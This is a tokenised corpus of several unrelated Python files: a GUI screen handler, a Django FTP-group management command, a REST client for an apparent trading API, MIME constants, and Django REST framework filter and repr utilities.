gaugesHandler ( self , item , event , clock ) : <EOL> self . hideInfoText ( ) <EOL> self . sensor_gadget . visible = False <EOL> self . dashboard . visible = True <EOL> self . weather . visible = False <EOL> def sensorsHandler ( self , item , event , clock ) : <EOL> self . hideInfoText ( ) <EOL> self . sensor_gadget . visible = True <EOL> self . dashboard . visible = False <EOL> self . weather . visible = False <EOL> def weatherHandler ( self , item , event , clock ) : <EOL> self . hideInfoText ( ) <EOL> self . sensor_gadget . visible = False <EOL> self . dashboard . visible = False <EOL> self . weather . visible = True <EOL> def logoutHandler ( self , item , event , clock ) : <EOL> from screens . authorize import ScreenAuthorize <EOL> self . loadScreen ( ScreenAuthorize ( ) ) </s>
<s> from . main import main <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import sys <EOL> from optparse import make_option <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from django_ftpserver import models <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) , ) <EOL> args = "<STR_LIT>" <EOL> def handle ( self , * args , ** options ) : <EOL> if len ( args ) < <NUM_LIT:1> : <EOL> raise CommandError ( "<STR_LIT>" ) <EOL> name = args [ <NUM_LIT:0> ] <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> home_dir = args [ <NUM_LIT:1> ] <EOL> else : <EOL> home_dir = None <EOL> if models . FTPUserGroup . objects . filter ( name = name ) . exists ( ) : <EOL> raise CommandError ( <EOL> "<STR_LIT>" . format ( name = name ) ) <EOL> group = models . FTPUserGroup ( name = name , home_dir = home_dir ) <EOL> if options [ '<STR_LIT>' ] : <EOL> group . permission = options [ '<STR_LIT>' ] <EOL> group . save ( ) <EOL> sys . stdout . write ( <EOL> "<STR_LIT>" . format ( <EOL> pk = group . pk , name = name ) ) </s>
<s> import json <EOL> import requests <EOL> from io import BytesIO <EOL> from time import sleep , time <EOL> from zipfile import ZipFile , BadZipfile <EOL> from logging import getLogger <EOL> from requests . exceptions import RequestException <EOL> try : <EOL> from types import NoneType <EOL> except ImportError : <EOL> NoneType = type ( None ) <EOL> from . exceptions import BadCredentials , BadRequest <EOL> log = getLogger ( __name__ ) <EOL> class Client ( object ) : <EOL> API_VERSION = "<STR_LIT>" <EOL> def __init__ ( <EOL> self , <EOL> environment , <EOL> account_id = None , <EOL> access_token = None , <EOL> json_options = None <EOL> ) : <EOL> self . domain , self . domain_stream = environment <EOL> self . access_token = access_token <EOL> self . account_id = account_id <EOL> self . json_options = json_options or { } <EOL> if account_id and not self . get_credentials ( ) : <EOL> raise BadCredentials ( ) <EOL> def get_credentials ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> try : <EOL> response = self . _Client__call ( uri = url ) <EOL> assert len ( response ) > <NUM_LIT:0> <EOL> return response <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def __get_response ( self , uri , params = None , method = "<STR_LIT>" , stream = False ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , "<STR_LIT>" ) or not self . session : <EOL> self . session = requests . Session ( ) <EOL> if self . access_token : <EOL> self . session . headers . update ( <EOL> { '<STR_LIT>' : '<STR_LIT>' . format ( self . access_token ) } <EOL> ) <EOL> if params : <EOL> params = { k : v for k , v in params . items ( ) if v is not None } <EOL> kwargs = { <EOL> "<STR_LIT:url>" : uri , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : stream <EOL> } <EOL> kwargs [ "<STR_LIT>" if method == "<STR_LIT>" else "<STR_LIT:data>" ] = params <EOL> return getattr ( self . session , method ) ( ** kwargs ) <EOL> def __call ( self , uri , params = None , method = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> resp = self . __get_response ( uri , params , method , False ) <EOL> rjson = resp . json ( ** self . json_options ) <EOL> assert resp . ok <EOL> except AssertionError : <EOL> msg = "<STR_LIT>" . format ( resp . status_code , rjson [ "<STR_LIT:message>" ] ) <EOL> raise BadRequest ( msg ) <EOL> except Exception as e : <EOL> msg = "<STR_LIT>" . format ( e ) <EOL> log . error ( msg , exc_info = True ) <EOL> raise BadRequest ( msg ) <EOL> else : <EOL> return rjson <EOL> def __call_stream ( self , uri , params = None , method = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> resp = self . __get_response ( uri , params , method , True ) <EOL> assert resp . ok <EOL> except AssertionError : <EOL> raise BadRequest ( resp . status_code ) <EOL> except Exception as e : <EOL> log . error ( "<STR_LIT>" . format ( e ) , exc_info = True ) <EOL> else : <EOL> return resp <EOL> def get_instruments ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( self . domain , self . API_VERSION ) <EOL> params = { "<STR_LIT>" : self . account_id } <EOL> try : <EOL> response = self . _Client__call ( uri = url , params = params ) <EOL> assert len ( response ) > <NUM_LIT:0> <EOL> return response <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_prices ( self , instruments , stream = True ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain_stream if stream else self . domain , <EOL> self . API_VERSION <EOL> ) <EOL> params = { "<STR_LIT>" : self . account_id , "<STR_LIT>" : instruments } <EOL> call = { "<STR_LIT>" : url , "<STR_LIT>" : params , "<STR_LIT>" : "<STR_LIT>" } <EOL> try : <EOL> if stream : <EOL> return self . _Client__call_stream ( ** call ) <EOL> else : <EOL> return self . _Client__call ( ** call ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_instrument_history ( self , instrument , candle_format = "<STR_LIT>" , <EOL> granularity = '<STR_LIT>' , count = <NUM_LIT> , <EOL> daily_alignment = None , alignment_timezone = None , <EOL> weekly_alignment = "<STR_LIT>" , start = None , <EOL> end = None ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( self . domain , self . API_VERSION ) <EOL> params = { <EOL> "<STR_LIT>" : self . account_id , <EOL> "<STR_LIT>" : instrument , <EOL> "<STR_LIT>" : candle_format , <EOL> "<STR_LIT>" : granularity , <EOL> "<STR_LIT:count>" : count , <EOL> "<STR_LIT>" : daily_alignment , <EOL> "<STR_LIT>" : alignment_timezone , <EOL> "<STR_LIT>" : weekly_alignment , <EOL> "<STR_LIT:start>" : start , <EOL> "<STR_LIT:end>" : end , <EOL> } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_orders ( self , instrument = None , count = <NUM_LIT:50> ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> params = { "<STR_LIT>" : instrument , "<STR_LIT:count>" : count } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_order ( self , order_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> order_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def create_order ( self , order ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( <EOL> uri = url , <EOL> params = order . __dict__ , <EOL> method = "<STR_LIT>" <EOL> ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def update_order ( self , order_id , order ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> order_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( <EOL> uri = url , <EOL> params = order . __dict__ , <EOL> method = "<STR_LIT>" <EOL> ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def close_order ( self , order_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> order_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_trades ( self , max_id = None , count = None , instrument = None , ids = None ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> params = { <EOL> "<STR_LIT>" : int ( max_id ) if max_id and max_id > <NUM_LIT:0> else None , <EOL> "<STR_LIT:count>" : int ( count ) if count and count > <NUM_LIT:0> else None , <EOL> "<STR_LIT>" : instrument , <EOL> "<STR_LIT>" : '<STR_LIT:U+002C>' . join ( ids ) if ids else None <EOL> } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_trade ( self , trade_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> trade_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def update_trade ( <EOL> self , <EOL> trade_id , <EOL> stop_loss = None , <EOL> take_profit = None , <EOL> trailing_stop = None <EOL> ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> trade_id <EOL> ) <EOL> params = { <EOL> "<STR_LIT>" : stop_loss , <EOL> "<STR_LIT>" : take_profit , <EOL> "<STR_LIT>" : trailing_stop <EOL> } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> raise NotImplementedError ( ) <EOL> def close_trade ( self , trade_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> trade_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_positions ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_position ( self , instrument ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> instrument <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def close_position ( self , instrument ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> instrument <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_transactions ( <EOL> self , <EOL> max_id = None , <EOL> count = None , <EOL> instrument = "<STR_LIT:all>" , <EOL> ids = None <EOL> ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> params = { <EOL> "<STR_LIT>" : int ( max_id ) if max_id and max_id > <NUM_LIT:0> else None , <EOL> "<STR_LIT:count>" : int ( count ) if count and count > <NUM_LIT:0> else None , <EOL> "<STR_LIT>" : instrument , <EOL> "<STR_LIT>" : '<STR_LIT:U+002C>' . join ( ids ) if ids else None <EOL> } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_transaction ( self , transaction_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> transaction_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def request_transaction_history ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> try : <EOL> resp = self . __get_response ( url ) <EOL> return resp . headers [ '<STR_LIT:location>' ] <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_transaction_history ( self , max_wait = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> url = self . request_transaction_history ( ) <EOL> if not url : <EOL> return False <EOL> ready = False <EOL> start = time ( ) <EOL> delay = <NUM_LIT:0.1> <EOL> while not ready and delay : <EOL> response = requests . head ( url ) <EOL> ready = response . ok <EOL> if not ready : <EOL> sleep ( delay ) <EOL> time_remaining = max_wait - time ( ) + start <EOL> max_delay = max ( <NUM_LIT:0.> , time_remaining - <NUM_LIT> ) <EOL> delay = min ( delay * <NUM_LIT:2> , max_delay ) <EOL> if not ready : <EOL> return False <EOL> response = requests . get ( url ) <EOL> try : <EOL> with ZipFile ( BytesIO ( response . content ) ) as container : <EOL> files = container . namelist ( ) <EOL> if not files : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> history = container . open ( files [ <NUM_LIT:0> ] ) <EOL> raw = history . read ( ) . decode ( '<STR_LIT:ascii>' ) <EOL> except BadZipfile : <EOL> log . error ( '<STR_LIT>' , exc_info = True ) <EOL> return False <EOL> return json . loads ( raw , ** self . json_options ) <EOL> def create_account ( self , currency = None ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( self . domain , self . API_VERSION ) <EOL> params = { "<STR_LIT>" : currency } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_accounts ( self , username = None ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( self . domain , self . API_VERSION ) <EOL> params = { "<STR_LIT:username>" : username } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False </s>
<s> JSON = "<STR_LIT>" <EOL> XML = "<STR_LIT>" <EOL> TXT = "<STR_LIT>" <EOL> HTML = "<STR_LIT:html>" <EOL> CSV = "<STR_LIT>" <EOL> RSS = "<STR_LIT>" <EOL> ATOM = "<STR_LIT>" <EOL> MARKDOWN = "<STR_LIT>" <EOL> DEFAULT_FORMAT = JSON <EOL> SUPPORTED_FORMATS = { <EOL> JSON : ( "<STR_LIT:application/json>" , ) , <EOL> XML : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> TXT : ( "<STR_LIT>" , ) , <EOL> HTML : ( "<STR_LIT>" , ) , <EOL> CSV : ( "<STR_LIT>" , ) , <EOL> RSS : ( "<STR_LIT>" , ) , <EOL> ATOM : ( "<STR_LIT>" , ) , <EOL> MARKDOWN : ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> } <EOL> def _supported_mimes ( SUPPORTED_FORMATS ) : <EOL> supported_mimes = { } <EOL> for format , mimes in SUPPORTED_FORMATS . iteritems ( ) : <EOL> for mime in mimes : <EOL> supported_mimes [ mime ] = format <EOL> return supported_mimes <EOL> SUPPORTED_MIMES = _supported_mimes ( SUPPORTED_FORMATS ) <EOL> SUPPORTED_METHODS = ( "<STR_LIT:GET>" , "<STR_LIT>" , "<STR_LIT:POST>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> UNFRIENDLY_ENABLE_FILTER = getattr ( settings , '<STR_LIT>' , True ) <EOL> UNFRIENDLY_SECRET = getattr ( settings , '<STR_LIT>' , <EOL> getattr ( settings , '<STR_LIT>' ) [ <NUM_LIT:0> : <NUM_LIT:32> ] ) <EOL> if not UNFRIENDLY_SECRET : <EOL> UNFRIENDLY_SECRET = '<STR_LIT>' * <NUM_LIT:8> <EOL> UNFRIENDLY_IV = getattr ( settings , '<STR_LIT>' , <EOL> getattr ( settings , '<STR_LIT>' ) [ <NUM_LIT:0> : <NUM_LIT:16> ] ) <EOL> if not UNFRIENDLY_IV : <EOL> UNFRIENDLY_IV = '<STR_LIT>' * <NUM_LIT:4> <EOL> UNFRIENDLY_ENFORCE_CHECKSUM = getattr ( settings , <EOL> '<STR_LIT>' , True ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import operator <EOL> from functools import reduce <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . db import models <EOL> from django . template import loader <EOL> from django . utils import six <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from rest_framework . compat import ( <EOL> crispy_forms , distinct , django_filters , guardian , template_render <EOL> ) <EOL> from rest_framework . settings import api_settings <EOL> if '<STR_LIT>' in settings . INSTALLED_APPS and crispy_forms and django_filters : <EOL> from crispy_forms . helper import FormHelper <EOL> from crispy_forms . layout import Layout , Submit <EOL> class FilterSet ( django_filters . FilterSet ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( FilterSet , self ) . __init__ ( * args , ** kwargs ) <EOL> for field in self . form . fields . values ( ) : <EOL> field . help_text = None <EOL> layout_components = list ( self . form . fields . keys ( ) ) + [ <EOL> Submit ( '<STR_LIT>' , _ ( '<STR_LIT>' ) , css_class = '<STR_LIT>' ) , <EOL> ] <EOL> helper = FormHelper ( ) <EOL> helper . form_method = '<STR_LIT:GET>' <EOL> helper . template_pack = '<STR_LIT>' <EOL> helper . layout = Layout ( * layout_components ) <EOL> self . form . helper = helper <EOL> filter_template = '<STR_LIT>' <EOL> elif django_filters : <EOL> class FilterSet ( django_filters . FilterSet ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( FilterSet , self ) . __init__ ( * args , ** kwargs ) <EOL> for field in self . form . fields . values ( ) : <EOL> field . help_text = None <EOL> filter_template = '<STR_LIT>' <EOL> else : <EOL> FilterSet = None <EOL> filter_template = None <EOL> class BaseFilterBackend ( object ) : <EOL> """<STR_LIT>""" <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> class DjangoFilterBackend ( BaseFilterBackend ) : <EOL> """<STR_LIT>""" <EOL> default_filter_set = FilterSet <EOL> template = filter_template <EOL> def __init__ ( self ) : <EOL> assert django_filters , '<STR_LIT>' <EOL> def get_filter_class ( self , view , queryset = None ) : <EOL> """<STR_LIT>""" <EOL> filter_class = getattr ( view , '<STR_LIT>' , None ) <EOL> filter_fields = getattr ( view , '<STR_LIT>' , None ) <EOL> if filter_class : <EOL> filter_model = filter_class . Meta . model <EOL> assert issubclass ( queryset . model , filter_model ) , '<STR_LIT>' % ( filter_model , queryset . model ) <EOL> return filter_class <EOL> if filter_fields : <EOL> class AutoFilterSet ( self . default_filter_set ) : <EOL> class Meta : <EOL> model = queryset . model <EOL> fields = filter_fields <EOL> return AutoFilterSet <EOL> return None <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> filter_class = self . get_filter_class ( view , queryset ) <EOL> if filter_class : <EOL> return filter_class ( request . query_params , queryset = queryset ) . qs <EOL> return queryset <EOL> def to_html ( self , request , queryset , view ) : <EOL> filter_class = self . get_filter_class ( view , queryset ) <EOL> if not filter_class : <EOL> return None <EOL> filter_instance = filter_class ( request . query_params , queryset = queryset ) <EOL> context = { <EOL> '<STR_LIT>' : filter_instance <EOL> } <EOL> template = loader . get_template ( self . template ) <EOL> return template_render ( template , context ) <EOL> class SearchFilter ( BaseFilterBackend ) : <EOL> search_param = api_settings . SEARCH_PARAM <EOL> template = '<STR_LIT>' <EOL> def get_search_terms ( self , request ) : <EOL> """<STR_LIT>""" <EOL> params = request . query_params . get ( self . search_param , '<STR_LIT>' ) <EOL> return params . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:U+0020>' ) . split ( ) <EOL> def construct_search ( self , field_name ) : <EOL> if field_name . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" % field_name [ <NUM_LIT:1> : ] <EOL> elif field_name . startswith ( '<STR_LIT:=>' ) : <EOL> return "<STR_LIT>" % field_name [ <NUM_LIT:1> : ] <EOL> elif field_name . startswith ( '<STR_LIT:@>' ) : <EOL> return "<STR_LIT>" % field_name [ <NUM_LIT:1> : ] <EOL> if field_name . startswith ( '<STR_LIT:$>' ) : <EOL> return "<STR_LIT>" % field_name [ <NUM_LIT:1> : ] <EOL> else : <EOL> return "<STR_LIT>" % field_name <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> search_fields = getattr ( view , '<STR_LIT>' , None ) <EOL> search_terms = self . get_search_terms ( request ) <EOL> if not search_fields or not search_terms : <EOL> return queryset <EOL> orm_lookups = [ <EOL> self . construct_search ( six . text_type ( search_field ) ) <EOL> for search_field in search_fields <EOL> ] <EOL> base = queryset <EOL> for search_term in search_terms : <EOL> queries = [ <EOL> models . Q ( ** { orm_lookup : search_term } ) <EOL> for orm_lookup in orm_lookups <EOL> ] <EOL> queryset = queryset . filter ( reduce ( operator . or_ , queries ) ) <EOL> return distinct ( queryset , base ) <EOL> def to_html ( self , request , queryset , view ) : <EOL> if not getattr ( view , '<STR_LIT>' , None ) : <EOL> return '<STR_LIT>' <EOL> term = self . get_search_terms ( request ) <EOL> term = term [ <NUM_LIT:0> ] if term else '<STR_LIT>' <EOL> context = { <EOL> '<STR_LIT>' : self . search_param , <EOL> '<STR_LIT>' : term <EOL> } <EOL> template = loader . get_template ( self . template ) <EOL> return template_render ( template , context ) <EOL> class OrderingFilter ( BaseFilterBackend ) : <EOL> ordering_param = api_settings . ORDERING_PARAM <EOL> ordering_fields = None <EOL> template = '<STR_LIT>' <EOL> def get_ordering ( self , request , queryset , view ) : <EOL> """<STR_LIT>""" <EOL> params = request . query_params . get ( self . ordering_param ) <EOL> if params : <EOL> fields = [ param . strip ( ) for param in params . split ( '<STR_LIT:U+002C>' ) ] <EOL> ordering = self . remove_invalid_fields ( queryset , fields , view ) <EOL> if ordering : <EOL> return ordering <EOL> return self . get_default_ordering ( view ) <EOL> def get_default_ordering ( self , view ) : <EOL> ordering = getattr ( view , '<STR_LIT>' , None ) <EOL> if isinstance ( ordering , six . string_types ) : <EOL> return ( ordering , ) <EOL> return ordering <EOL> def get_valid_fields ( self , queryset , view ) : <EOL> valid_fields = getattr ( view , '<STR_LIT>' , self . ordering_fields ) <EOL> if valid_fields is None : <EOL> serializer_class = getattr ( view , '<STR_LIT>' ) <EOL> if serializer_class is None : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise ImproperlyConfigured ( msg % self . __class__ . __name__ ) <EOL> valid_fields = [ <EOL> ( field . source or field_name , field . label ) <EOL> for field_name , field in serializer_class ( ) . fields . items ( ) <EOL> if not getattr ( field , '<STR_LIT>' , False ) and not field . source == '<STR_LIT:*>' <EOL> ] <EOL> elif valid_fields == '<STR_LIT>' : <EOL> valid_fields = [ <EOL> ( field . name , field . verbose_name ) for field in queryset . model . _meta . fields <EOL> ] <EOL> valid_fields += [ <EOL> ( key , key . title ( ) . split ( '<STR_LIT>' ) ) <EOL> for key in queryset . query . annotations . keys ( ) <EOL> ] <EOL> else : <EOL> valid_fields = [ <EOL> ( item , item ) if isinstance ( item , six . string_types ) else item <EOL> for item in valid_fields <EOL> ] <EOL> return valid_fields <EOL> def remove_invalid_fields ( self , queryset , fields , view ) : <EOL> valid_fields = [ item [ <NUM_LIT:0> ] for item in self . get_valid_fields ( queryset , view ) ] <EOL> return [ term for term in fields if term . lstrip ( '<STR_LIT:->' ) in valid_fields ] <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> ordering = self . get_ordering ( request , queryset , view ) <EOL> if ordering : <EOL> return queryset . order_by ( * ordering ) <EOL> return queryset <EOL> def get_template_context ( self , request , queryset , view ) : <EOL> current = self . get_ordering ( request , queryset , view ) <EOL> current = None if current is None else current [ <NUM_LIT:0> ] <EOL> options = [ ] <EOL> for key , label in self . get_valid_fields ( queryset , view ) : <EOL> options . append ( ( key , '<STR_LIT>' % ( label , _ ( '<STR_LIT>' ) ) ) ) <EOL> options . append ( ( '<STR_LIT:->' + key , '<STR_LIT>' % ( label , _ ( '<STR_LIT>' ) ) ) ) <EOL> return { <EOL> '<STR_LIT>' : request , <EOL> '<STR_LIT>' : current , <EOL> '<STR_LIT>' : self . ordering_param , <EOL> '<STR_LIT>' : options , <EOL> } <EOL> def to_html ( self , request , queryset , view ) : <EOL> template = loader . get_template ( self . template ) <EOL> context = self . get_template_context ( request , queryset , view ) <EOL> return template_render ( template , context ) <EOL> class DjangoObjectPermissionsFilter ( BaseFilterBackend ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> assert guardian , '<STR_LIT>' <EOL> perm_format = '<STR_LIT>' <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> extra = { } <EOL> user = request . user <EOL> model_cls = queryset . model <EOL> kwargs = { <EOL> '<STR_LIT>' : model_cls . _meta . app_label , <EOL> '<STR_LIT>' : model_cls . _meta . model_name <EOL> } <EOL> permission = self . perm_format % kwargs <EOL> if guardian . VERSION >= ( <NUM_LIT:1> , <NUM_LIT:3> ) : <EOL> extra = { '<STR_LIT>' : False } <EOL> else : <EOL> extra = { } <EOL> return guardian . shortcuts . get_objects_for_user ( user , permission , queryset , ** extra ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import re <EOL> from django . db import models <EOL> from django . utils . encoding import force_text <EOL> from django . utils . functional import Promise <EOL> from rest_framework . compat import unicode_repr <EOL> def manager_repr ( value ) : <EOL> model = value . model <EOL> opts = model . _meta <EOL> for _ , name , manager in opts . concrete_managers + opts . abstract_managers : <EOL> if manager == value : <EOL> return '<STR_LIT>' % ( model . _meta . object_name , name ) <EOL> return repr ( value ) <EOL> def smart_repr ( value ) : <EOL> if isinstance ( value , models . Manager ) : <EOL> return manager_repr ( value ) <EOL> if isinstance ( value , Promise ) and value . _delegate_text : <EOL> value = force_text ( value ) <EOL> value = unicode_repr ( value ) <EOL> if value . startswith ( "<STR_LIT>" ) and value . endswith ( "<STR_LIT:'>" ) : <EOL> return value [ <NUM_LIT:1> : ] <EOL> value = re . sub ( '<STR_LIT>' , '<STR_LIT:>>' , value ) <EOL> return value <EOL> def field_repr ( field , force_many = False ) : <EOL> kwargs = field . _kwargs <EOL> if force_many : <EOL> kwargs = kwargs . copy ( ) <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> arg_string = '<STR_LIT:U+002CU+0020>' . join ( [ smart_repr ( val ) for val in field . _args ] ) <EOL> kwarg_string = '<STR_LIT:U+002CU+0020>' . join ( [ <EOL> '<STR_LIT>' % ( key , smart_repr ( val ) ) <EOL> for key , val in sorted ( kwargs . items ( ) ) <EOL> ] ) <EOL> if arg_string and kwarg_string : <EOL> arg_string += '<STR_LIT:U+002CU+0020>' <EOL> if force_many : <EOL> class_name = force_many . __class__ . __name__ <EOL> else : <EOL> class_name = field . __class__ . __name__ <EOL> return "<STR_LIT>" % ( class_name , arg_string , kwarg_string ) <EOL> def serializer_repr ( serializer , indent , force_many = None ) : <EOL> ret = field_repr ( serializer , force_many ) + '<STR_LIT::>' <EOL> indent_str = '<STR_LIT:U+0020>' * indent <EOL> if force_many : <EOL> fields = force_many . fields <EOL> else : <EOL> fields = serializer . fields <EOL> for field_name , field in fields . items ( ) : <EOL> ret += '<STR_LIT:\n>' + indent_str + field_name + '<STR_LIT>' <EOL> if hasattr ( field , '<STR_LIT>' ) : <EOL> ret += serializer_repr ( field , indent + <NUM_LIT:1> ) <EOL> elif hasattr ( field , '<STR_LIT>' ) : <EOL> ret += list_repr ( field , indent + <NUM_LIT:1> ) <EOL> elif hasattr ( field , '<STR_LIT>' ) : <EOL> ret += field_repr ( field . child_relation , force_many = field . child_relation ) <EOL> else : <EOL> ret += field_repr ( field ) <EOL> if serializer . validators : <EOL> ret += '<STR_LIT:\n>' + indent_str + '<STR_LIT>' <EOL> ret += '<STR_LIT:\n>' + indent_str + '<STR_LIT>' + smart_repr ( serializer . validators ) <EOL> return ret <EOL> def list_repr ( serializer , indent ) : <EOL> child = serializer . child <EOL> if hasattr ( child , '<STR_LIT>' ) : <EOL> return serializer_repr ( serializer , indent , force_many = child ) 